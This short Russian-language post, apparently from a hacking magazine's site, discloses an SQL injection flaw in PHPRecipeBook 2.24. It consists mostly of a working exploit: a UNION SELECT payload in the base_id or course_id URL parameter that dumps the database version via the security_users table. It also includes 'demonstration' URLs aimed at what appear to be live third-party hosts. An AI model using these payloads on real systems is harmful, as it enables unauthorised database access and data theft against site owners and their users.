Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: PHPRecipeBook 2.24
Уязвимость позволяет удаленному злоумышленнику выполнить произвольные
SQL-запросы в базе данных приложения.
Эксплоит:
localhost.com[path]index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--
Демонстрация:
http://phprecipebook.sourceforge.net/demo/phprecipebook/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--
http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--